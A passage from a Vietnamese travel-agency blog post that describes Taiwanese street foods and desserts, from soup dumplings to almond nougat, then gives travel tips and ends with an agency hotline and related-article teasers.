Xiao Long Bao hay Bánh bao súp là một loại bánh bao hấp có nguồn gốc từ Trung Quốc. Đây là một món điểm tâm ngon và khá phổ biến, thường có nhân thịt mặn bên trong và nước dùng đậm đà đi kèm. Tuy món ăn có nguồn gốc từ Thượng Hải, Trung Quốc, nhưng nó nhanh chóng trở nên phổ biến ở nhiều quốc gia khác, trong đó có Đài Loan.

Du lịch Đài Loan từ Nhật Bản 2023 - Bánh Bao Súp Xiao Long Bao

Món ăn này thường được ăn như là một món điểm tâm hoặc bữa ăn xế truyền thống của người dân Đài Loan

Điểm đặc biệt của món bánh bao này là có ăn kèm với nước chấm. Và món nước chấm ăn kèm là giấm đậu nành, khá là quen thuộc với những tín đồ yêu thích dim sum. Nhân bánh bao gồm thịt lợn và nước dùng được nêm nếm vừa vị, cho vào bánh trước khi hấp. Nhờ vậy, những chiếc bánh không chỉ mềm xốp mà còn đẫm vị nước súp thơm ngon.

Món ăn này thường được ăn như là một món điểm tâm hoặc bữa ăn xế truyền thống của người dân Đài Loan. Trong đó thường có các món như là bánh bao, mì và các món ăn nhẹ khác. Đây là một món ăn đáng mong đợi mà du khách tour du lịch Đài Loan từ Nhật Bản 2023 nên thử.

>>>Xem thêm: Săn loạt vé rẻ Hà Nội Đài Bắc dịp đầu năm giá chỉ từ 9 USD

3. Trứng Chiên Hàu Orh Jian

Trứng tráng hàu được chế biến bằng cách trộn hỗn hợp gồm trứng, bột ngô và bột gạo đều trong chảo nóng. Sau khi hỗn hợp đã hòa quyện cùng nhau thì cho hàu vào cùng với các gia vị như hành lá, tỏi và ngò.

Du lịch Đài Loan từ Nhật Bản 2023 - Trứng Chiên Hàu Orh Jian

Đây là một món ăn nhanh ngon, dễ làm và phù hợp cho những cuộc dạo chơi vào ban đêm

Món hàu tráng trứng được ăn kèm với nước chấm pha chua chua ngọt ngọt từ nước tương, giấm, đường và ít ớt. Món trứng tráng bông xốp và giòn rụm bên ngoài, bên trong thì lại mềm mềm, thơm béo.

Du khách tour du lịch Đài Loan từ Nhật Bản 2023 có thể tìm thấy món trứng chiên hàu Orh Jian tại các khu chợ hoặc những quán ăn đường phố tại Đài Loan. Đây là một món ăn nhanh ngon, dễ làm và phù hợp cho những cuộc dạo chơi vào ban đêm.

4. Đậu Phụ Lên Men Chou Dou Fu

Đậu Phụ Lên Men Chou Dou Fu từ lâu được biết đến là một món ăn phổ biến của Trung Quốc, hay còn được gọi là đậu phụ lên men hoặc đậu hũ thối. Nó được làm bằng những khối đậu phụ thô và cho lên men trong dung dịch có rượu gạo, giấm và các loại gia vị khác. Kết quả là thu được một món ăn có mùi hăng, cay nồng. Đậu Phụ Lên Men Chou Dou Fu thường được phục vụ như một món ăn nhẹ hoặc món khai vị trong các bữa ăn.

Du lịch Đài Loan từ Nhật Bản 2023 - Đậu Phụ Lên Men Chou Dou Fu

Nếu bạn đang tìm kiếm một món ăn độc đáo, mới lạ và bùng nổ vị giác thì Đậu phụ lên men là một sự lựa chọn không tồi

Sau khi đậu phụ đã lên men sẽ được chiên ngập trong dầu cho đến khi giòn bên ngoài và bên trong xốp. Sau đó, du khách tour du lịch Đài Loan từ Nhật Bản 2023 sẽ ăn kèm với nhiều loại nước chấm như: Nước tương, tương ớt và dầu mè.

Nếu bạn đang tìm kiếm một món ăn độc đáo, mới lạ và bùng nổ vị giác thì Đậu phụ lên men là một sự lựa chọn không tồi. Nếu bỏ qua về mùi vị có phần “khó ngửi” của nó thì món ăn này là một nguồn cung cấp chất protein và các dưỡng chất tuyệt vời. Nói chung, Đậu phụ lên men Chou Dou Fu là một món ăn nên thử và có phần khá “mạo hiểm”.

>>>Xem thêm: Mua vé giá rẻ đi Cao Hùng thưởng ngoạn những danh thắng tráng lệ

5. Bánh Tiết Heo Ti Hoeh Koe

Bánh tiết heo Ti Hoeh Koe còn được gọi là bánh gạo tiết lợn cùng với nấm. Nó được làm bằng cách lấy tiết lợn trộn với ít thịt lợn băm, mộc nhĩ, hẹ và các loại gia vị có mùi thơm khác. Hỗn hợp sau khi hòa quyện vào nhau thì được gói trong lá chuối và hấp cho đến khi chín.

Du lịch Đài Loan từ Nhật Bản 2023 - Bánh Tiết Heo Ti Hoeh Koe

Bánh tiết heo Ti Hoeh Koe còn được gọi là bánh gạo tiết lợn cùng với nấm

Kết quả là một chiếc Bánh tiết lợn mềm xốp với nhân thịt lợn và nấm thơm thơm ngon ra lò. Vì được gói bằng lá chuối nên nó sẽ tạo thêm hương vị độc đáo cho món ăn, giúp giữ cho bánh gạo ẩm và mềm hơn. Bánh tiết heo Ti Hoeh Koe thường được ăn kèm với nước mắm, nước tương và tương ớt.

6. Bánh Mặt Trời Tai Yang Bing

Tai Yang Bing là món tráng miệng của Đài Loan có nghĩa là “Bánh Mặt trời”. Đây là một loại bánh ngọt truyền thống có nguồn gốc từ Đài Trung, Đài Loan. Bánh được làm với lớp vỏ ngọt và xốp chứa hỗn hợp mạch nha và các loại hạt khác nhau như: Hạnh nhân, hạt vừng và đậu phộng. Sau đó, bánh được cho vào lò nướng cho đến khi ngả màu vàng nâu đẹp mắt, tạo ra lớp ngoài giòn và ngọt và nhân dai và béo ngậy.

Du lịch Đài Loan từ Nhật Bản 2023 - Bánh Mặt Trời Tai Yang Bing

Sở dĩ, bánh có tên như vậy là từ hình dạng tròn và màu vàng đặc trưng, giống như mặt trời

Sở dĩ, bánh có tên như vậy là từ hình dạng tròn và màu vàng đặc trưng, giống như mặt trời. Đây là một món tráng miệng phổ biến ở Đài Loan và thường được khách tour du lịch Đài Loan từ Nhật Bản 2023 mua về làm quà tặng nếu có dịp đến Đài Loan.

Bánh Mặt Trời Tai Yang Bing là món tráng miệng thơm ngon, độc đáo, rất thích hợp cho những ai thích hương vị ngọt ngào và béo ngậy. Nó là một món ăn nhẹ tuyệt vời để thưởng thức cùng với một tách trà hoặc cà phê, và cũng có thể là một món quà tuyệt vời cho bạn bè và gia đình sau chuyến tour du lịch Đài Loan từ Nhật Bản 2023 đó nhé!

>>>Xem thêm: Vietjet tung vé 0 đồng chặng bay từ Hà Nội – Cao Hùng

7. Kẹo Hạnh Nhân Nougat

Kẹo Hạnh Nhân Nougat là một loại kẹo có nguồn gốc từ châu Âu, nhưng đã trở nên phổ biến ở nhiều nơi trên thế giới, trong đó có Đài Loan. Đó là một món ngọt bao gồm: Caramel, mật ong, đường và các loại hạt rang, điển hình là hạnh nhân. Hỗn hợp được nấu lên cho đến khi trở nên đặc và sệt, sau đó đổ vào khuôn và để nguội và cứng lại.

Du lịch Đài Loan từ Nhật Bản 2023 - Kẹo Hạnh Nhân Nougat

Kẹo Nougat thường được thưởng thức như một món ngọt hoặc món ăn nhẹ, và cũng có thể được dùng làm lớp phủ cho kem hoặc các món tráng miệng khác

Kẹo sau khi thành phẩm sẽ dai và bùi, có vị ngọt và hơi dính. Nó thường được cắt thành những miếng nhỏ vừa ăn và bọc trong giấy gói hoặc giấy gói riêng lẻ, khiến nó trở thành một món ăn nhẹ tiện lợi và dễ mang theo.

Kẹo hạnh nhân Nougat là một loại kẹo phổ biến, khách tour du lịch Đài Loan từ Nhật Bản 2023 có thể tìm thấy nó ở nhiều cửa hàng kẹo đặc sản trên những con đường. Kẹo Nougat thường được thưởng thức như một món ngọt hoặc món ăn nhẹ, và cũng có thể được dùng làm lớp phủ cho kem hoặc các món tráng miệng khác.

NHỮNG LƯU Ý KHI ĐI TOUR DU LỊCH ĐÀI LOAN TỪ NHẬT BẢN 2023

Khi đi tour du lịch Đài Loan từ Nhật Bản 2023, có một số lưu ý sau đây mà bạn nên lưu ý:

  • Chuẩn bị tiền mặt: Mặc dù đồng Đài Tệ có thể được chấp nhận trên nhiều nơi, nhưng vẫn có một số cửa hàng và nhà hàng chỉ chấp nhận thanh toán bằng phương thức trả tiền mặt. Nên bạn hãy đổi tiền tại các sân bay hoặc ngân hàng trước khi sang Đài Loan.
  • Nên sử dụng phương tiện công cộng: Đài Loan có một hệ thống giao thông công cộng phát triển và tiện lợi. Do đó, bạn có thể sử dụng phương tiện công cộng để tiết kiệm được một khoản chi phí di chuyển.
  • Thử các món ăn địa phương: Đài Loan có nhiều món ăn độc đáo và nổi bậc, khách đi tour du lịch Đài Loan từ Nhật Bản 2023 nên thử ít nhất một trong số đó.
  • Sắp xếp lịch trình hợp lý: Để khám phá hết những địa điểm thú vị của Đài Loan, bạn nên sắp xếp lịch trình phù hợp và chọn những điểm đến hợp lý với mình để bạn có thể tham quan nhiều điểm nhất có thể.
  • Tìm hiểu về địa điểm du lịch bạn sắp đến: Trước khi đi du lịch Đài Loan, bạn nên tìm hiểu trước về các địa điểm du lịch, các hoạt động và các lễ hội diễn ra tại địa phương để có một trải nghiệm tốt nhất.

>>>Xem thêm: Vietjet tung ra hàng triệu vé Tết giá sốc, chỉ từ 0 VND

Với kinh nghiệm du lịch Đài Loan từ Nhật Bản 2023 cực chi tiết của Đi Để Đến vừa chia sẻ. Hy vọng du khách sẽ có một sự chuẩn bị thật tốt và có những phút giây ý nghĩa, thoải mái tại quốc đảo Đài Loan. Nếu quý khách tour du lịch Đài Loan từ Nhật Bản 2023 muốn biết thêm thông tin nào liên quan đến chuyến đi hoặc hỗ trợ tư vấn tour du lịch miễn phí. Bạn vui lòng liên hệ đường dây nóng: 1900 3398 để được giải đáp. Xin chân thành cảm ơn!

ĐĂNG KÍ TƯ VẤN TOUR DU LỊCH ĐÀI LOAN TỪ NHẬT BẢN 2023

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]